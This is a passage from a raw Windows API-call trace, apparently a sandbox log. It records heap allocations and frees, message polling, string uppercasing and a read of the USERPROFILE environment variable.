lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0215.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0215.131] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0215.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0215.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0215.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ac8 [0215.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0215.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0215.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0215.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0215.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0215.131] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0215.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab038 [0215.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0215.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf90 [0215.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0215.132] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0215.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0215.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0215.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0215.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0215.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0215.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0215.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0215.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0215.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0215.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.132] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854218 [0215.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0215.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0215.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0215.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0215.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0215.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0215.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b58 [0215.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0215.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0215.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0215.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0215.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0215.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0215.133] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf60 [0215.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0215.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab098 [0215.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0215.134] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0215.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0215.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0215.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0215.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0215.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0215.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0215.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0215.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38541a0 [0215.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0215.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0215.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0215.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0215.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719d8 [0215.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0215.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0215.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b98 [0215.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0215.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0215.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0215.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaeb8 [0215.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0215.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0215.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0215.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0215.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0215.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0215.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0215.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0215.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0215.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0215.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0215.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0215.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0215.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0215.136] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0215.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0215.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0215.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0215.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0215.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0215.136] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0215.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0215.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0215.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0215.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0215.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0215.137] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0215.137] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0215.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0215.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0215.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0215.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0215.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0215.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0215.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0215.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0215.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0215.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0215.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0215.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0215.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0215.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.138] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0215.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0215.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0215.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0215.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0215.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0215.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0215.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0215.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0215.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0215.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0215.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0215.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0215.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0215.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0215.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0215.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0215.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0215.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0215.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0215.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0215.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0215.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0215.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0215.140] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0215.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.140] RtlAllocateHeap (HeapHandle=0x2af0000, 